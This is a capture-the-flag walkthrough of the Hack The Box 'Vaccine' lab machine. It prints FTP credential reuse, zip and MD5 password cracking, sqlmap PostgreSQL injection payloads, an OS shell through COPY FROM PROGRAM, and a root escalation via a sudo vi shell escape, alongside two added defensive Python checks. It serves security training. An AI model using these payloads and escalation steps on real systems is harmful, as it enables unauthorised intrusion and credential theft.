HTB Starting Point – Vaccine

kali@kali:~/ctf-tools$ ./portScan.sh

[+] 10.10.10.46 scan started...
[-] Open ports : 21,22,80 found
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 15:49 EDT
Nmap scan report for 10.10.10.46
Host is up (0.042s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.61 seconds
[+] 10.10.10.46 scan finished…
  • Remember that we found an FTP user on the previous machine.

Try ftpuser / mc@F1l3ZilL4 and we get access to this FTP server.

kali@kali:~/ctf-tools$ ftp 10.10.10.46

Connected to 10.10.10.46.
220 (vsFTPd 3.0.3)
Name (10.10.10.46:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> dir

200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0               2 Feb 03 11:23 a
-rw-r--r--    1 0        0            2533 Feb 03 11:27 backup.zip
226 Directory send OK.

ftp> get backup.zip

local: backup.zip remote: backup.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
226 Transfer complete.
2533 bytes received in 0.00 secs (22.7892 MB/s)
  • This archive is password protected.

kali@kali:~/htb/vaccine$ sudo zip2john backup.zip > hash

ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: 2b chk, TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: 2b chk, TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
  • zip2john converts the ZIP archive's encryption metadata into a hash format that John the Ripper can crack.

kali@kali:~/htb/vaccine$ sudo john hash --fork=4 --wordlist="/opt/rockyou.txt"

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (backup.zip)
1 1g 0:00:00:00 DONE (2020-05-06 17:03) 100.0g/s 25600p/s 25600c/s 25600C/s football1..simpleplan
Waiting for 3 children to terminate
2 0g 0:00:00:00 DONE (2020-05-06 17:03) 0g/s 4656Kp/s 4656Kc/s 4656KC/s  derrickak47.abygurl69
4 0g 0:00:00:00 DONE (2020-05-06 17:03) 0g/s 4596Kp/s 4596Kc/s 4596KC/s  mar ..*7¡Vamos!
3 0g 0:00:00:00 DONE (2020-05-06 17:03) 0g/s 4596Kp/s 4596Kc/s 4596KC/s  brian89.a6_123
Use the "--show" option to display all of the cracked passwords reliably
Session completed
  • Several files are found inside the zip archive (index.php and style.css).

Open index.php.

The password it contains seems to be hashed.

Let's try to reverse it with an online MD5 lookup: https://www.md5online.org/md5-decrypt.html

Access the site http://10.10.10.46 and log in with the credentials we obtained (admin/qwerty789).

We land on this page: http://10.10.10.46/dashboard.php

  • Using the search textbox we find that parameters are sent with the GET method (http://10.10.10.46/dashboard.php?search=test)
  • Using the inspect functionality of Firefox we see that a PHPSESSID cookie is stored.

Let's check whether this request can be exploited with sqlmap.

ruben@kali:~/ctf-tools$ sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=6u7ladfpr4j50t6otur3kl8ff3"

GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=a' AND (SELECT (CASE WHEN (4011=4011) THEN NULL ELSE CAST((CHR(119)||CHR(111)||CHR(115)||CHR(103)) AS NUMERIC) END)) IS NULL-- IYRB
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=a' AND 3130=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (3130=3130) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC)-- qZfx
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=a';SELECT PG_SLEEP(5)--
    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=a' AND 2980=(SELECT 2980 FROM PG_SLEEP(5))-- SbcV
---
[11:55:24] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[11:55:24] [INFO] fetched data logged to text files under '/home/ruben/.sqlmap/output/10.10.10.46'
[*] ending @ 11:55:24 /2020-05-08/
  • The page is vulnerable to multiple injection types and the back-end DBMS is PostgreSQL.
  • Commands can be executed on the underlying host through PostgreSQL using sqlmap's --os-shell option. This works because the web application connects to the database as the postgres superuser (as dashboard.php shows further down), and COPY ... FROM PROGRAM requires superuser-level privileges.
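As an added defender-side example (not part of the original writeup), the following Python scans Apache access-log lines for the PostgreSQL injection patterns that appear in the sqlmap output above; the log lines are constructed from those payloads, and the log format and signature names are my assumptions.

```python
import re
from urllib.parse import parse_qs, quote, unquote_plus, urlsplit

# Signatures derived from the sqlmap payloads shown in the writeup above
SIGNATURES = {
    "CAST-based boolean/error": re.compile(r"cast\s*\(.*as\s+numeric\s*\)", re.I | re.S),
    "CHR() string building": re.compile(r"chr\s*\(\s*\d+\s*\)\s*\|\|", re.I),
    "stacked query": re.compile(r"'\s*;\s*(select|insert|update|delete|copy)\b", re.I),
    "time-based (PG_SLEEP)": re.compile(r"pg_sleep\s*\(", re.I),
    "UNION injection": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}

# Apache combined log format (assumed): client ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def inspect_request(path):
    """Decode each query parameter of a request path; return matching signature names."""
    hits = set()
    for values in parse_qs(urlsplit(path).query, keep_blank_values=True).values():
        for value in values:
            decoded = unquote_plus(value)  # second pass catches double-encoded payloads
            hits.update(label for label, rx in SIGNATURES.items() if rx.search(decoded))
    return sorted(hits)

def scan_log(lines):
    """Return (client ip, path, signature names) for every request matching a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real deployment would count these
        hits = inspect_request(m["path"])
        if hits:
            findings.append((m["ip"], m["path"].split("?", 1)[0], hits))
    return findings

def make_line(ip, payload):
    """Build a constructed log line for /dashboard.php?search=<payload> (sample data only)."""
    return (f'{ip} - - [08/May/2020:11:55:24 +0000] '
            f'"GET /dashboard.php?search={quote(payload, safe="")} HTTP/1.1" 200 1523')

# Constructed sample: one benign search and two payloads taken from the sqlmap output above
SAMPLE_LOG = [
    make_line("10.10.14.5", "Mustang"),
    make_line("10.10.14.5", "a';SELECT PG_SLEEP(5)--"),
    make_line("10.10.14.5", "a' AND (SELECT (CASE WHEN (4011=4011) THEN NULL ELSE "
                            "CAST((CHR(119)||CHR(111)||CHR(115)||CHR(103)) AS NUMERIC) END)) IS NULL-- IYRB"),
]
```

Run `scan_log(SAMPLE_LOG)` to get the two offending requests with their matched signatures; a benign search returns nothing.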

kali@kali:~/ctf-tools$  sudo sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=8btur1o66svr5cr76mtve1pvnq" --os-shell

[*] starting @ 14:50:33 /2020-05-08/
[14:50:33] [INFO] resuming back-end DBMS 'postgresql' 
[14:50:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=a';SELECT PG_SLEEP(5)--
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: search=a' UNION ALL SELECT NULL,(CHR(113)||CHR(122)||CHR(113)||CHR(107)||CHR(113))||(CHR(112)||CHR(90)||CHR(70)||CHR(77)||CHR(107)||CHR(84)||CHR(112)||CHR(112)||CHR(115)||CHR(99)||CHR(118)||CHR(120)||CHR(84)||CHR(103)||CHR(119)||CHR(82)||CHR(70)||CHR(78)||CHR(113)||CHR(88)||CHR(77)||CHR(83)||CHR(100)||CHR(66)||CHR(116)||CHR(90)||CHR(85)||CHR(112)||CHR(109)||CHR(79)||CHR(69)||CHR(77)||CHR(115)||CHR(111)||CHR(81)||CHR(70)||CHR(119)||CHR(73)||CHR(107)||CHR(85))||(CHR(113)||CHR(118)||CHR(98)||CHR(118)||CHR(113)),NULL,NULL,NULL-- Csfu
---
[14:50:34] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[14:50:34] [INFO] fingerprinting the back-end DBMS operating system
[14:50:35] [INFO] the back-end DBMS operating system is Linux
[14:50:35] [INFO] testing if current user is DBA
[14:50:35] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[14:50:35] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>

Using: https://github.com/florianges/-HTB-Vaccine_sql_injection

SHELL=/bin/bash script -q /dev/null

postgres@vaccine:/var/lib/postgresql/11/main$

postgres@vaccine:/var/lib/postgresql/11/main$ cd /var/www/html     

cd /var/www/html
postgres@vaccine:/var/www/html$ ls 
ls
bg.png        dashboard.js   index.php    style.css
dashboard.css  dashboard.php  license.txt
postgres@vaccine:/var/www/html$

postgres@vaccine:/var/www/html$ cat dashboard.php

try {
  $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
}

postgres@vaccine:/var/www/html$ python3 -c "import pty;pty.spawn('/bin/bash')"

python3 -c "import pty;pty.spawn('/bin/bash')"

postgres@vaccine:/var/www/html$ sudo -l

[sudo] password for postgres: P@s5w0rd!
Matching Defaults entries for postgres on vaccine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

We can only run this one command with sudo: /bin/vi /etc/postgresql/11/main/pg_hba.conf

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

  • Once vi is started it is possible to run an external command, and because vi was started with sudo that command runs as root.
  • The :! command runs a shell command from inside vi.
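As an added hardening check that is not part of the original writeup, this Python audits `sudo -l` output like the one shown above for rules that hand out an editor or pager able to spawn a shell, and proposes the sudoedit (or NOEXEC) form instead; the program lists and the output format it parses are assumptions.

```python
import os
import re

# Interactive programs that can run a shell from inside (e.g. vi's :! command)
EDITORS = {"vi", "vim", "view", "nano"}
PAGERS = {"less", "more", "man"}

# One rule as printed by `sudo -l`: "(runas) [TAG: ...] /path/command [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$")

def audit_rule(line):
    """Return a finding dict for a risky rule, or None if the rule is not a shell-escape risk."""
    m = RULE_RE.match(line)
    if not m:
        return None
    cmd, args = m["cmd"], m["args"].strip()
    name = os.path.basename(cmd)
    tags = {t.rstrip(":") for t in m["tags"].split()}
    if "NOEXEC" in tags or name not in EDITORS | PAGERS:
        return None
    if name in EDITORS and args:
        # sudoedit edits a temporary copy as the invoking user: no root shell is reachable
        fix = f"({m['runas']}) sudoedit {args}"
    else:
        # NOEXEC stops the program from executing children; existing tags are not carried over
        fix = f"({m['runas']}) NOEXEC: {cmd} {args}".rstrip()
    return {"command": cmd, "args": args, "reason": f"{name} can spawn a shell", "suggested": fix}

def audit_sudo_l(output):
    """Audit every rule line in `sudo -l` output; returns the list of findings."""
    return [f for f in (audit_rule(l) for l in output.splitlines()) if f]

# Constructed sample modelled on the sudo -l output in the writeup, plus two rules that should pass
SAMPLE_SUDO_L = """\
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
    (ALL) NOPASSWD: /usr/bin/systemctl restart postgresql
    (root) NOEXEC: /usr/bin/less /var/log/postgresql/postgresql-11-main.log
"""
```

`audit_sudo_l(SAMPLE_SUDO_L)` flags only the /bin/vi rule and suggests `(ALL) sudoedit /etc/postgresql/11/main/pg_hba.conf`.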

 :!/bin/bash

root@vaccine:/etc/postgresql/11/main# id

uid=0(root) gid=0(root) groups=0(root)

root@vaccine:/etc/postgresql/11/main# cd
root@vaccine:~# pwd

/root

root@vaccine:~# ls

pg_hba.conf  root.txt  snap

root@vaccine:~# cat root.txt

dd6eXXXXXXXXXXXXXXXXXXXXXXXXXXXX